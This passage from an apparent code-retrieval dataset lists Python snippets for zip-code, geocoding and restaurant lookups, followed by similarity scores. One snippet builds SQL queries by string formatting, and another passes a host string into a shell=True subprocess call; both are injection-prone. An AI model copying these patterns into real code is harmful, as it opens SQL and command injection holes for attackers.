%f)\" % (\n str(station),\n int(warnings[0].data['distance_meters'] - warnings[0].data['max_distance_meters']),\n int(warnings[0].data['max_distance_meters']),\n int(warnings[0].data['distance_meters']),\n zipcode,\n lat,\n lon,\n ))\n logging.warning(\"Closest station %s is too far. Using backup-method station %s instead.\" % (\n str(station),\n station_lookup_method_by_zipcode))\n return station_lookup_method_by_zipcode\n\n return str(station)", "def get_zipcode_stations(add):\r\n name=get_zipcode_names(add)\r\n engine = get_sql_engine()\r\n neighborhood_stations = text(\r\n \"\"\"\r\n SELECT\r\n \"name\" as name,\r\n \"addressStreet\" as address,\r\n \"bikesAvailable\" as available_bikes,\r\n v.geom as geom,\r\n ST_X(v.geom) as lon, ST_Y(v.geom)as lat\r\n FROM indego_rt1130 as v\r\n JOIN philly_zipcode as n\r\n ON ST_Intersects(v.geom, n.geom)\r\n WHERE n.code = :name\r\n \"\"\"\r\n )\r\n stations = gpd.read_postgis(neighborhood_stations, con=engine, params={\"name\": name})\r\n return stations", "def show_restaurants(customer_score, seed_number=1, area=None, rank=None, search_key=None,page=1):\n\tcuisine_match = {\n\t\t'american': ['American','Steak','New American','French-American'],\n\t\t'french': ['French','French/Italian','French-American','French| Gluten Free'],\n\t\t'italian': ['Italian','French/Italian'],\n\t\t'asian': ['Asian','Japanese','Middle Eastern','Chinese','Korean','Indian','Thai'],\n\t}\n\trank_match = {'Platinum': 5, 'Gold': 4, 'Silver': 3, 'Bronze': 2, 'Blue': 1}\n\n\tquery = Restaurants.query.filter(Restaurants.dinerscode_rank >= 1, Restaurants.dinerscode_rank <= get_maximum_rank(customer_score), Restaurants.is_deleted == 'N')\n\n\tif area and area != 'ALL':\n\t\tquery = query.filter(Restaurants.area == area)\n \n\tif rank in rank_match:\n\t\tquery = query.filter(Restaurants.dinerscode_rank == rank_match[rank])\n\n\tif search_key:\n\t\tsearch_key = search_key.lower()\n\t\tcuisine_lst = cuisine_match[search_key] if search_key in cuisine_match else (search_key,)\n\t\tquery = query.filter(or_(Restaurants.restaurant_name.ilike('%{}%'.format(search_key)),\n\t\t \t\t Restaurants.cuisine_type.in_(cuisine_lst),\n\t\t \t\t Restaurants.cuisine_type.ilike('%{}%'.format(search_key))))\n\t\t# restaurants = [res for res in restaurants if search_key in res.restaurant_name.lower() or search_key in res.cuisine_type.lower()]\n\n\tquery = query.order_by(func.rand(seed_number)).offset(offset).paginate(page, 12)\n\n\treturn query", "def find_with_postcode(self, postcode, predicate=None, skip_cache=False):\n now = _time_ms(datetime.datetime.utcnow())\n if skip_cache or now - self._last_updated > CACHE_LIMIT:\n self._process_stations()\n\n info = self.pc.get(postcode)\n if not info:\n raise InvalidPostcodeException(\"No known postcode %s\" % postcode)\n if 'geo' not in info or not set(['lat', 'lng']) <= set(info['geo']):\n raise InvalidDataException(\"Missing latitude and/or longitude\")\n lat, lng = float(info['geo']['lat']), float(info['geo']['lng'])\n return self.find_with_geo(lat, lng, predicate=predicate)", "def suggestions(self, input, borough_code=None):\n parsed = parser.address(input)\n if borough_code:\n parsed['BOROUGH_CODE'] = borough_code\n self.similiar_names = []\n self.results = []\n if parsed['PHN'] and parsed['STREET']:\n if not parsed['BOROUGH_CODE'] and not parsed['ZIP']:\n # iterate borocodes\n for x in range(1, 6):\n self._geocode(phn=parsed['PHN'], street=parsed['STREET'], borough_code=x)\n # try address with borough code if present\n elif parsed['BOROUGH_CODE']:\n self._geocode(phn=parsed['PHN'], street=parsed['STREET'], borough_code=parsed['BOROUGH_CODE'])\n # try address with zip code if present\n elif parsed['ZIP']:\n self._geocode(phn=parsed['PHN'], street=parsed['STREET'], zip=parsed['ZIP'])\n # validate and retrieve any addresses\n if len(self.similiar_names):\n for name in self.similiar_names:\n self._geocode(phn=parsed['PHN'], street=name['street'], borough_code=name['borough_code'])\n if None in self.results:\n self.results = list(filter(lambda v: v is not None, self.results))\n\n return self.results", "def lookup_muni(name_muni=None, code_muni=None, verbose=False):\n # Get metadata with data url addresses\n temp_meta = utils.select_metadata(geo=\"lookup_muni\", year=2010)\n\n # Read DataFrame available at provided url\n lookup_table = utils.download_metadata(\n temp_meta.loc[:, \"download_path\"].to_list()[0]\n )\n lookup_table[\"name_muni_format\"] = lookup_table[\"name_muni_format\"].str.lower()\n\n # Search by inputs\n if (\n code_muni == \"all\"\n or name_muni == \"all\"\n or (code_muni is None and name_muni is None)\n ):\n if verbose:\n print(f\"Returning results for all municipalities\")\n return lookup_table.iloc[:, :-1]\n\n elif code_muni is not None:\n if name_muni is not None:\n if verbose:\n print(\"Ignoring argument name_muni\")\n try:\n output = lookup_table[lookup_table[\"code_muni\"] == int(code_muni)].iloc[\n :, :-1\n ]\n if verbose:\n print(\n \"Returning results for municipality \",\n f'{output.loc[:, \"name_muni\"].to_list()[0]}',\n )\n return output\n\n except KeyError:\n raise Exception(\n f\"The `code_muni` argument {code_muni}\",\n \"was not found in the database.\",\n )\n\n elif name_muni is not None:\n # Cleaning from accents and turning into lower cases without spaces\n name_muni = utils.strip_accents(str(name_muni).lower().strip())\n output = lookup_table[lookup_table[\"name_muni_format\"] == name_muni]\n\n if len(output) == 0:\n if verbose:\n print(\"Please insert a valid municipality name\")\n raise Exception(\n f\"The `name_muni` argument {name_muni} \",\n \"was not found in the database.\",\n )\n else:\n if verbose:\n print(\n \"Returning results for municipality\"\n f'{output.loc[:, \"name_muni\"].to_list()[0]}'\n )\n return output.iloc[:, :-1]\n\n elif code_muni == \"all\" and name_muni == \"all\":\n if verbose:\n print(\"Please insert either a municipality \", \"name or a municipality code\")", "def find_airport_code_by_city(city):\n airports = get_airports()\n\n if city == 'London':\n return 'LHR'\n\n for airport_code in airports:\n if airports[airport_code].lower() == city.lower():\n return airport_code\n return None", "def city_state_zip(**kwargs):\r\n result = \"{city_name}, {state_code}\".format(**kwargs)\r\n if kwargs[\"five_digit_zip_code\"]:\r\n # RLID for some reason has two spaces between state & ZIP.\r\n result += \" {five_digit_zip_code}\".format(**kwargs)\r\n return result", "def postal_code(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"postal_code\")", "def postal_code(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"postal_code\")", "def postal_code(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"postal_code\")", "def findARestaurant(mealType,location):\n\t#1. Use getGeocodeLocation to get the latitude and longitude coordinates of the location string.\n\t# lat_lng = f\"{getGeocodeLocation(location)}\"\n\t# lat_lng_formatted = lat_lng[lat_lng.find(\"(\")+1:lat_lng.find(\")\")]\n\tlatitude, longitude = getGeocodeLocation(location)\n\n\t#2. Use foursquare API to find a nearby restaurant with the latitude, longitude, and mealType strings.\n\t#HINT: format for url will be something like https://api.foursquare.com/v2/venues/search?client_id=CLIENT_ID&client_secret=CLIENT_SECRET&v=20130815&ll=40.7,-74&query=sushi\n\turl = (f\"https://api.foursquare.com/v2/venues/search?client_id={foursquare_client_id}&client_secret={foursquare_client_secret}&v={version}&ll={latitude},{longitude}&intent=browse&radius=10000&query={mealType}&limit=10\")\n\th = httplib2.Http()\n\tresult = json.loads(h.request(url, \"GET\")[1])\n\n\t#3. Grab the first restaurant\n\tvenue_id = result[\"response\"][\"venues\"][0][\"id\"]\n\tvenue_name = result[\"response\"][\"venues\"][0][\"name\"]\n\tvenue_location = result[\"response\"][\"venues\"][0][\"location\"]\n\n\t#4. Get a 300x300 picture of the restaurant using the venue_id (you can change this by altering the 300x300 value in the URL or replacing it with 'orginal' to get the original picture\n\timg_url = (f\"https://api.foursquare.com/v2/venues/{venue_id}/photos?client_id={foursquare_client_id}&client_secret={foursquare_client_secret}&v={version}&group=venue&limit=10\")\n\timg_h = httplib2.Http()\n\timg_result = json.loads(img_h.request(img_url, \"GET\")[1])\n\tprint(img_result)\n\n\t#5. Grab the first image\n\tif len(img_result[\"response\"][\"photos\"][\"items\"]) > 0:\n\t\timg_url = f\"{img_url_pre_lim['prefix']}300x300{img_url_pre_lim['suffix']}\"\n\n\t#6. If no image is available, insert default a image url\n\telse:\n\t\timg_url = \"https://cps-static.rovicorp.com/3/JPG_400/MI0003/711/MI0003711195.jpg?partner=allrovi.com\"\n\n\t#7. Return a dictionary containing the restaurant name, address, and image url\t\n\tresult = {\"name\": venue_name, \"address\": venue_location.get(\"address\",\"\"), \"img_url\": img_url}\n\tprint(result)\n\treturn result", "def geo_coder(house_number, boro_code, street_name, zip_code): \r\n wa1 = '1B{}{}{}{}{}C{}{}'.format(rightpad(house_number, 16), rightpad('', 38), boro_code, rightpad('', 10), rightpad(street_name, 32), rightpad('', 113), rightpad(zip_code, 5))\r\n wa1 = rightpad(wa1, 1200)\r\n wa2 = rightpad('', 4300)\r\n NYCGeo.NYCgeo(wa1, wa2)\r\n return wa1, wa2", "def get_supplier_address_by_name(supplier_name: str) -> str:\n # Open a new connection\n db, cursor = db_connector.cursor()\n\n query = \"select address from supplier where name = '{}';\".format(supplier_name)\n cursor.execute(query)\n data = cursor.fetchall()\n db.disconnect()\n return data[0][0]", "def zip_code(self):\n\n\t\telement = Element(driver=self.driver,\n\t\t explicit_wait_time=self.explicit_wait_time,\n\t\t locator=BillPayPageLocator.ZIP_CODE_INPUT)\n\t\treturn element.element_value", "def search(self,name=None):\n\t\taddresses = discover_devices()\n\t\t#if len(addresses) == 0:\n\t\t#\treturn None\n\t\tnames = []\n\t\tfor adr in addresses:\n\t\t\tnames.append(lookup_name(adr))\n\t\t\tif name != None and name == names[-1]:\n\t\t\t\treturn adr\n\n\t\treturn zip(addresses,names)", "def get_full_address(postal_code):\n from app.models.address import Address\n\n address = Address.find_one(postal_code)\n if address:\n return jsonify(address.to_dict())\n return jsonify(dict())", "def test_get_restaurants(self):\n address = {'number': '375',\n 'street': 'Noe St',\n 'city': 'San Francisco',\n 'zip': '94114'}\n\n with self.app.app_context():\n restaurants = ordrin.get_restaurants(address)\n\n # Ordr.in returns a test entry as the first item in the list when\n # when hitting their testing servers.\n entry = restaurants[0]\n self.assertEquals(entry['na'], 'Test Merchant 20130315')\n self.assertEquals(entry['id'], 23917)", "def replace_zip_code(zip_code):\r\n if len(zip_code)>5:\r\n return zip_code[0:5]\r\n else:\r\n return zip_code", "def search():\n\n # Store the 'q' part of the URL as a string called 'q'. Check 'q' loaded, and produce runtime error if not.\n # e.g. '12589'\n q = request.args.get(\"q\")\n if not q:\n raise RuntimeError(\"missing location\")\n\n # Rewrites user input as lowercase\n q = str.lower(q)\n\n # Select the entire row from database 'places' that at least contains the value of 'q' in one of the 'postal_code', 'place_name', or 'admin_name1' fields.\n # e.g. [{'country_code':'US','postal_code':'12589'}]\n q_info = db.execute(\"SELECT * FROM places WHERE postal_code LIKE :q OR LOWER(place_name) LIKE :q OR LOWER(admin_name1) LIKE :q LIMIT 10\", q='%'+q+'%')\n\n # Run 'q_info' dict through 'jsonify()' function to convert some elements to JSON compatible(?)\n return jsonify(q_info)", "def zipcode_validation(add):\r\n lng=get_address(add)[1]\r\n lat=get_address(add)[0]\r\n engine = get_sql_engine()\r\n query = text(\r\n \"\"\"\r\n SELECT\r\n code\r\n FROM philly_zipcode\r\n WHERE ST_Intersects(geom, ST_SetSRID(ST_MakePoint(:lng, :lat), 4326))\r\n \"\"\"\r\n )\r\n resp = engine.execute(query,lng=lng, lat=lat).fetchall()\r\n return resp", "def search():\n # q is the name of the http parameter\n request.args.get(\"q\")\n\n #check for missing arguments\n if not(request.args.get(\"q\")):\n raise RuntimeError(\"Missing geo!\")\n\n #\"%\":match any number of characters\n q=request.args.get(\"q\") + \"%\"\n\n #retrieve data from database\n rows=db.execute(\"SELECT * from places WHERE postal_code LIKE :pc OR place_name LIKE :city OR admin_name1 LIKE :state\", pc=q,city=q,state=q)\n\n return jsonify(rows)", "def search_food(cls, name):\n obj = cls.objects(name=name).first()\n return obj", "def get_city_by_name(request, city_prefix):\n cities = City.objects.filter(city_name__istartswith=city_prefix)[:5]\n serializer = AllCitiesSerializer(cities, many=True)\n return Response(serializer.data)", "def zipcode(self, zipcode):\n self._zipcode = zipcode", "def search_zipcode(driver, zipcode, links_file, min_page):\n time.sleep(LOADING_TIME)\n driver = fill_forms(driver, zipcode)\n\n # If a minimum page number was inputted, go to that url directly\n if min_page:\n url = driver.current_url\n page_url = url.split('&ns=1')[0] + '&start=' + str((min_page - 1) * 10)\n driver.get(page_url)\n\n source = driver.page_source\n soup = BeautifulSoup(source, \"html.parser\")\n \n # If it hit a captcha, stop everything\n if check_captcha(soup):\n sys.exit('Hit Captcha at zipcode ' + zipcode)\n\n # If it didn't find anything for that zip code, skip it\n if not soup.find(text = \"Sorry, but we didn't understand the location you entered.\"):\n # Go to each business link on search page\n driver = go_through_businesses(driver, soup, links_file, zipcode)\n\n # Go to next page of businesses in search, if there is a next page\n while True:\n try:\n # next_tag = driver.find_element_by_xpath(\"//a[@class='page-option prev-next next']\")\n next_tag = driver.find_element_by_xpath(\"//a[@class='u-decoration-none next pagination-links_anchor']\")\n # If there's no next button, you're done\n except:\n break\n else:\n driver.execute_script(\"return arguments[0].scrollIntoView();\", next_tag)\n time.sleep(LOADING_TIME)\n\n next_tag.click()\n time.sleep(LOADING_TIME)\n source = driver.page_source\n soup = BeautifulSoup(source, \"html.parser\")\n driver = go_through_businesses(driver, soup, links_file, zipcode)\n\n return driver", "def query_business_name():\n print()\n business_name = input(\n 'Please enter full business name or type \"back\" or \"quit\": ')\n print()\n if business_name == \"quit\":\n print(\"Goodbye!\")\n sys.exit()\n if business_name == \"back\":\n return \"back\"\n\n business_object = business_col.find_one({\"name\": business_name})\n if business_object is None:\n print(\"No business found with given name.\")\n\n return business_object", "def zipcode(self, zipcode):\n if zipcode is None:\n raise ValueError(\"Invalid value for `zipcode`, must not be `None`\") # noqa: E501\n\n self._zipcode = zipcode", "def get_zipcode_takeouts(add):\r\n name=get_zipcode_names(add)\r\n engine = get_sql_engine()\r\n zipcode_takeouts = text(\r\n \"\"\"\r\n SELECT\r\n \"NAME\" as name, \"ADDRESS\" as address,\r\n geom, ST_X(geom) as lon, ST_Y(geom)as lat\r\n FROM chinese_takeout\r\n WHERE \"ZIP\" = :name\r\n\r\n \"\"\"\r\n )\r\n ctakeouts = gpd.read_postgis(zipcode_takeouts, con=engine, params={\"name\": name})\r\n return ctakeouts", "def retrieve_location(self, street, zip, city, country):\n \n query = u\"%s, %s, %s\" %(street, city, country)\n query = urllib.quote(query.encode(\"utf-8\"))\n\n url = \"https://api.mapbox.com/v4/geocode/mapbox.places/%s.json?access_token=%s\" %(query, self.config.mapbox_access_token)\n response = requests.get(url)\n if response.status_code!=200:\n raise LocationNotFound()\n\n data = response.json()['features']\n\n if len(data)==0:\n query = u\"%s, %s\" %(city, country)\n query = urllib.quote(query.encode(\"utf-8\"))\n\n # trying again but only with city\n url = \"https://api.mapbox.com/v4/geocode/mapbox_places/%s.json?access_token=%s\" %(query, self.config.mapbox_access_token)\n data = requests.get(url).json()\n data = data['features']\n\n if len(data)==0:\n raise LocationNotFound()\n\n # for some reason in geojson it is (long,lat). Oh yeah\n return tuple(reversed(data[0]['center']))", "def run_script():\n var=raw_input(\"Enter a Zipcode: \")\n address='http://www.uszip.com/zip/'+var\n conn=urllib.urlopen(address)\n t=[]\n for line in conn.fp:\n\tline=line.strip()\n\tif '<title>' in line:\n\t line.split()\n\t print line[7:-16]\n\tif 'Total population' in line:\n\t line=line.strip('z')\n\t loc=line.index('Total population')\n\t loc2=line.index('<span')\n\t print line[(loc+25):loc2]", "def principal_zip_code(self, principal_zip_code):\n\n self._principal_zip_code = principal_zip_code", "def find_address():\n while True:\n business_object = query_business_name()\n if business_object == \"back\":\n return\n elif business_object is None:\n continue\n\n print(f'{business_object[\"name\"]}\\'s address is:'\n f'{business_object[\"address\"]}, {business_object[\"city\"]} '\n f'{business_object[\"state\"]}')", "def postal_code(self) -> pulumi.Output[Optional[str]]:\n return pulumi.get(self, \"postal_code\")", "def fuzzy_pcode(\n self, countryiso3: str, name: str, logname: Optional[str] = None\n ) -> Optional[str]:\n if (\n self.countries_fuzzy_try is not None\n and countryiso3 not in self.countries_fuzzy_try\n ):\n if logname:\n self.ignored.add((logname, countryiso3))\n return None\n name_to_pcode = self.name_to_pcode.get(countryiso3)\n if not name_to_pcode:\n if logname:\n self.errors.add((logname, countryiso3))\n return None\n adm_name_lookup = clean_name(name)\n adm_name_lookup2 = multiple_replace(\n adm_name_lookup, self.admin_name_replacements\n )\n pcode = name_to_pcode.get(\n adm_name_lookup, name_to_pcode.get(adm_name_lookup2)\n )\n if not pcode and name.lower() in self.admin_fuzzy_dont:\n if logname:\n self.ignored.add((logname, countryiso3, name))\n return None\n if not pcode:\n for map_name in name_to_pcode:\n if adm_name_lookup in map_name:\n pcode = name_to_pcode[map_name]\n if logname:\n self.matches.add(\n (\n logname,\n countryiso3,\n name,\n self.pcode_to_name[pcode],\n \"substring\",\n )\n )\n break\n for map_name in name_to_pcode:\n if adm_name_lookup2 in map_name:\n pcode = name_to_pcode[map_name]\n if logname:\n self.matches.add(\n (\n logname,\n countryiso3,\n name,\n self.pcode_to_name[pcode],\n \"substring\",\n )\n )\n break\n if not pcode:\n map_names = list(name_to_pcode.keys())\n lower_mapnames = [x.lower() for x in map_names]\n\n def al_transform_1(name):\n if name[:3] == \"al \":\n return f\"ad {name[3:]}\"\n else:\n return None\n\n def al_transform_2(name):\n if name[:3] == \"al \":\n return name[3:]\n else:\n return None\n\n matching_index = self.phonetics.match(\n lower_mapnames,\n adm_name_lookup,\n alternative_name=adm_name_lookup2,\n transform_possible_names=[al_transform_1, al_transform_2],\n )\n\n if matching_index is None:\n if logname:\n self.errors.add((logname, countryiso3, name))\n return None\n\n map_name = map_names[matching_index]\n pcode = name_to_pcode[map_name]\n if logname:\n self.matches.add(\n (\n logname,\n countryiso3,\n name,\n self.pcode_to_name[pcode],\n \"fuzzy\",\n )\n )\n return pcode", "def _extract_zipcode(self):\n self.col_etl = self.col_etl.apply(lambda x: x[0:2])\n self.col_etl.name = 'deliv_sector'", "def zip_code(self, value):\n regex = config.get('validators', 'zip_code')\n zipcode = re.search(regex,\n value)\n if not zipcode:\n raise ZipCodeError(\"ZipCodeError: 'zip_code' must be 5 non-float digits\")\n else:\n self._zip_code = value", "def search_for_customer(f_name: str, l_name: str):\n return cr.search_for_customer(f_name=f_name, l_name=l_name)", "async def async_query_locations(self,\n zip_code: str = None,\n latitude: str = None,\n longitude: str = None):\n\n location_url = f\"{API_BASE_URL}/locations\"\n headers = {\n \"Accept\": \"application/json\"\n }\n params = {}\n if latitude and longitude:\n params[\"filter.lat.near\"] = latitude\n params[\"filter.lon.near\"] = longitude\n elif zip_code:\n params[\"filter.zipCode.near\"] = zip_code\n else:\n params['filter.lat.near'] = str(self._hass.config.latitude)\n params['filter.lon.near'] = str(self._hass.config.longitude)\n\n try:\n location_resp = await self._oauth_session.async_request('GET',\n location_url,\n params=params,\n headers=headers)\n location_resp.raise_for_status()\n json_response = await location_resp.json()\n locations = [\n {\n 'locationId': item['locationId'],\n 'name': item['name']\n }\n for item\n in json_response['data']]\n return locations\n except Exception as ex:\n _LOGGER.error(\"Unable to retrieve locations: %s\",\n str(ex))\n return None", "def get_address_by_name(name, limit):\n request = \"{}/{}?key={}&q={}&type=json&limit={}\".format(config.GEOCODE_URL, config.GEOCODE_SEARCH_PATH, config.GEOCODE_KEY, name, limit)\n response = requests.get(request).json()\n return response", "def list_near_postcode(code):\n index_postcode = \"\".join(code.split()).upper()\n postcode = models.Postcode.query.get(index_postcode)\n\n if postcode is None:\n raise NotFound(\n Markup(\"Postcode <strong>{}</strong> does not exist.\").format(code)\n )\n if postcode.text != code:\n # Redirect to correct URL, eg 'W1A+1AA' instead of 'w1a1aa'\n return redirect(url_for(\".list_near_postcode\", code=postcode.text),\n code=302)\n\n stops = postcode.stops_in_range(db.undefer(models.StopPoint.lines))\n groups = _group_lines_stops(stops)\n\n return render_template(\"postcode.html\", postcode=postcode, list_stops=stops,\n groups=groups)", "def zip_code(self):\n return self._zip_code", "def getZipCode(dbpath) -> (int, float, float):\n conn = sqlite3.connect(str(dbpath))\n c = conn.cursor()\n c.execute(\"select zipcode, lat, long from user where id=1\")\n conn.commit()\n zipcode = c.fetchone()\n conn.close()\n return zipcode[0], zipcode[1], zipcode[2]", "def find_zip_code(x):\n i = 0\n j = 4\n for i in range(1,len(x)-6):\n string = x[i-1:i+6]\n cond = (string[1:-1].isnumeric(), not string[0].isnumeric(), not string[-1].isnumeric())\n if all(cond):\n return x[i:i+5]", "def _geocode(self, phn, street, borough_code=None, zip=None):\n try:\n r = self._g[self.geofunction](house_number=phn, street=street, borough_code=borough_code, zip=zip)\n self.results.append(r)\n except GeosupportError as ge:\n if 'SIMILAR NAMES' in ge.result[\"Message\"]:\n list_of_street_names = ge.result['List of Street Names']\n r = [{\n 'street': s,\n 'borough_code': borough_code\n } for s in list_of_street_names]\n self.similiar_names.extend(r)", "def Collection_search_name(C:list, name:str) -> list:\r\n restaurants = []\r\n for r in C:\r\n for dish in r.menu:\r\n if name in dish.name:\r\n restaurants.append(r)\r\n return restaurants", "def get_zipcode_markets(add):\r\n name=get_zipcode_names(add)\r\n engine = get_sql_engine()\r\n zipcode_markets = text(\r\n \"\"\"\r\n SELECT\r\n \"NAME\" as name, \"ADDRESS\" as address,\r\n \"TIME\" as time, geom,\r\n ST_X(geom) as lon, ST_Y(geom)as lat\r\n FROM farmers_markets\r\n WHERE \"ZIP\" = :name\r\n \"\"\"\r\n )\r\n fmarkets = gpd.read_postgis(zipcode_markets, con=engine, params={\"name\": name})\r\n return fmarkets", "def schoolNameFromPassCode(pass_code):\n try:\n return Team.objects.get(pass_code=pass_code).organization.name\n except Team.DoesNotExist:\n return None", "def lookup(addr, num, street, city, code, geo_dict, failure_set):\n try:\n address_url = \"https://geocoding.geo.census.gov/geocoder/locations/address?\" + \\\n \"street=\" + str(num) + \"+\" + street.replace(\" \", \"+\") + \"&city=\" + city + \"&zip=\" + \\\n str(code) + \"&benchmark=9&format=json\"\n geo_data = json.load(req.urlopen(address_url).decode('utf-8'))['result']\n except Exception:\n try:\n address_url = \"https://geocoding.geo.census.gov/geocoder/locations/address?\" + \\\n \"street=\" + str(num) + \"+\" + street.replace(\" \", \"+\") + \"&city=\" + city + \"&zip=\" + \\\n str(code) + \"&benchmark=9&format=json\"\n geo_data = json.loads(req.urlopen(address_url).read().decode('utf-8'))['result']\n except Exception as e:\n print(e, addr)\n failure_set.add(addr)\n return None\n if len(geo_data['addressMatches']) == 0:\n print(addr, ': Failure')\n failure_set.add(addr)\n return None\n print(addr, ': Success')\n location = geo_data['addressMatches'][0]['coordinates']\n latlong = ','.join([str(location['y']), str(location['x'])])\n geo_dict[addr] = latlong\n return tuple(float(geo) for geo in latlong.split(','))", "def find(self, text: unicode) -> ghidra.program.model.address.Address:\n ...", "def read_street_city_names(path=work_david, filter_neighborhoods=True,\n fix_alley=True):\n import pandas as pd\n df = pd.read_csv(path/'street_names_israel.csv', encoding=\"cp1255\")\n df.columns = ['city_code', 'city_name', 'street_code', 'street_name']\n df['city_name'] = df['city_name'].str.replace(\n 'תל אביב - יפו', 'תל אביב יפו')\n if filter_neighborhoods:\n df = df[df['street_code'] <= 5999]\n if fix_alley:\n df['street_name'] = df['street_name'].str.replace('סמ ', 'סמטת ')\n return df", "def postal_code(self, instance):\r\n return instance.user.profile.postal_code", "def parse_restaurant_name(text):\n stripped = text.lower()\n\n for name_list in RESTAURANT_NAMES:\n for name in name_list:\n if name.lower() in stripped:\n return name_list[0]\n\n return \"\"", "def get_city(address):\n geolocator = Nominatim(user_agent=\"specify_your_app_name_here\")\n \n while True:\n try:\n location = geolocator.geocode(address)\n break\n except Exception:\n None\n \n city = citipy.nearest_city(location.latitude, location.longitude)\n return [city.city_name.title(), city.country_code.title()]", "def findName(zippedFile):\n pp = linesFromZippedFile(zippedFile, 'project.properties')\n if pp:\n return pp[1][:-1].split('=')[1]\n return \"\"", "def get_my_zip_code(\n namespace: Optional[str] = None,\n x_additional_headers: Optional[Dict[str, str]] = None,\n **kwargs\n):\n if namespace is None:\n namespace, error = get_services_namespace()\n if error:\n return None, error\n request = GetMyZipCode.create(\n namespace=namespace,\n )\n return run_request(request, additional_headers=x_additional_headers, **kwargs)", "def get_name(book, phone):\n # поиск в словаре\n if str(type(book)) == \"<class 'dict'>\":\n abonent = book.get(str(phone))\n return abonent\n # поиск в списке\n else:\n for b in book:\n if DEBUG:\n print(b[0], phone, phone==b[0], b[1])\n if b[0]==phone:\n return b[1]\n \n return None", "def searchByName(database):\n firstname=str(input(\"What is his first name :\"))\n usr,find=getByName(database,firstname)\n if find:\n print(usr)", "def GeoLocZip(zip_code, cntry):\r\n nb_error = 0\r\n #Try connection with OSM server\r\n while(nb_error < 100):\r\n try :\r\n #connection succeed\r\n time.sleep(1)\r\n g = geocoder.osm(str(zip_code)+' '+str(cntry))\r\n break\r\n except:\r\n #connection failed\r\n #try again\r\n nb_error += 1\r\n print(\"error req - nb_error : \"+str(nb_error))\r\n continue\r\n #g.osm['x'] = longitude\r\n #g.osm['y'] = latitude\r\n return g.osm['x'], g.osm['y']", "def test_lookup_entry_by_name(self):\n self.phonebook.add(\"Bob\", \"12345\")\n self.assertEqual(\"12345\", self.phonebook.lookup(\"Bob\"))", "def geocode_one(self, postcode: str, address: Optional[str] = None) -> pd.Series:\n if postcode is None and address is None:\n raise utils.GenericException(\"You must pass either postcode or address, or both.\")\n if self.gmaps_key is None:\n self.gmaps_key = self._load_key()\n if self.gmaps_key is not None:\n self.gmaps_client = googlemaps.Client(key=self.gmaps_key)\n if self.cache is None:\n self._load_cache()\n sep = \", \" if address and postcode else \"\"\n postcode = postcode if postcode is not None else \"\"\n address = address if address is not None else \"\"\n search_term = f\"{address}{sep}{postcode}\"\n if search_term in self.cache:\n logging.debug(\"Loading GMaps Geocoder API result from cache: '%s'\", search_term)\n geocode_result = self.cache[search_term]\n else:\n logging.debug(\"Querying Google Maps Geocoder API for '%s'\", search_term)\n if self.gmaps_key is None:\n return pd.Series({\"latitude\": np.nan, \"longitude\": np.nan, \"match_status\": 0})\n geocode_result = self.gmaps_client.geocode(search_term, region=\"uk\")\n self.cache[search_term] = geocode_result\n self.cache_modified = True\n if not geocode_result or len(geocode_result) > 1:\n return pd.Series({\"latitude\": np.nan, \"longitude\": np.nan, \"match_status\": 0})\n geometry = geocode_result[0][\"geometry\"]\n ok_loc_types = [\"ROOFTOP\", \"GEOMETRIC_CENTER\"]\n if geometry[\"location_type\"] in ok_loc_types or \\\n geocode_result[0][\"types\"] == [\"postal_code\"]:\n return pd.Series({\"latitude\": geometry[\"location\"][\"lat\"],\n \"longitude\": geometry[\"location\"][\"lng\"],\n \"match_status\": 3})\n return pd.Series({\"latitude\": np.nan, \"longitude\": np.nan, \"match_status\": 0})", "def getEntry(self, zip_file):\n \n return self.getAllEntries().get(zip_file)", "def fix_location(r):\n \n # all is fine: just change zipcode datatype to str\n if not np.isnan(r['zip']) and not np.isnan(r['lat']):\n return [str(int(r['zip'])), r['lng'], r['lat']]\n \n # try to locate within zipcode polygons\n if not np.isnan(r['lat']):\n query = \"\"\"\n SELECT t.geoid as zip, {} as lng, {} as lat\n FROM us_zcta5 t JOIN usps_zcta5 z ON t.geoid = z.zip\n WHERE ST_Contains(t.shape, ST_GeomFromText('POINT({} {})', 2))\n \"\"\"\n res = pd.read_sql(query.format(r['lng'], r['lat'], r['lng'], r['lat']), con = con)\n if len(res) == 1:\n return res.values[0].tolist()\n\n # use zipcode center as location proxy: geocoding is prefered in this case, but might be quite expensive\n if not np.isnan(r['zip']):\n res = zipcodes[zipcodes['zip'] == str(int(r['zip']))]\n if len(res) == 1:\n return res.values[0].tolist()[:3]\n\n return [None, None, None]", "def searchCountry(host):\n process = subprocess.Popen(\"geoiplookup \"+host,stdout=subprocess.PIPE, shell=True)\n (output, err) = process.communicate()\n secondPart = output.split(\"GeoIP Country Edition: \", 1)[1]\n country = secondPart.split(\"\\nGeoIP City Edition\", 1)[0]\n return country", "def get_country_code(country_name):\n for code, name in COUNTRIES.items():\n if name == country_name:\n return code\n # if string isn't found returns None\n else:\n continue", "def country(name):\n return location_db().find(name=name)[\"country\"]", "def get_city(self, territory_id: str = \"\"):", "def get_city(self, territory_id: str = \"\"):" ]
[ "0.72173095", "0.669443", "0.66253436", "0.66198653", "0.64643675", "0.6446394", "0.6327299", "0.62487876", "0.6163434", "0.6108556", "0.6016015", "0.5976856", "0.59515876", "0.5928086", "0.57584274", "0.57179135", "0.5710414", "0.5634522", "0.56298053", "0.5622634", "0.55962557", "0.55466205", "0.55463", "0.5541144", "0.55284435", "0.5525873", "0.5525492", "0.54803157", "0.54749537", "0.5468904", "0.54457366", "0.54452455", "0.5412685", "0.5376579", "0.53727096", "0.53326607", "0.5331357", "0.53236043", "0.53039724", "0.5287272", "0.527973", "0.52766496", "0.52766496", "0.52766496", "0.5198934", "0.5194489", "0.51744586", "0.5156221", "0.51405466", "0.5140064", "0.51244974", "0.5099282", "0.509161", "0.5088811", "0.5087377", "0.50869673", "0.5080285", "0.50790596", "0.50707585", "0.50634885", "0.5042655", "0.5040994", "0.50223315", "0.5003732", "0.49967054", "0.4995582", "0.4994981", "0.49834424", "0.49768955", "0.49507967", "0.49494335", "0.49488053", "0.49443567", "0.4939537", "0.4939483", "0.4937237", "0.4936235", "0.49275413", "0.4925153", "0.49232978", "0.49161", "0.4914992", "0.49138454", "0.4909963", "0.48948297", "0.4891174", "0.48813117", "0.48795304", "0.48759368", "0.4875739", "0.4873573", "0.48651558", "0.48649505", "0.48640317", "0.48613998", "0.48588765", "0.48588225", "0.48549655", "0.48469034", "0.4844906", "0.4844906" ]
0.0
-1
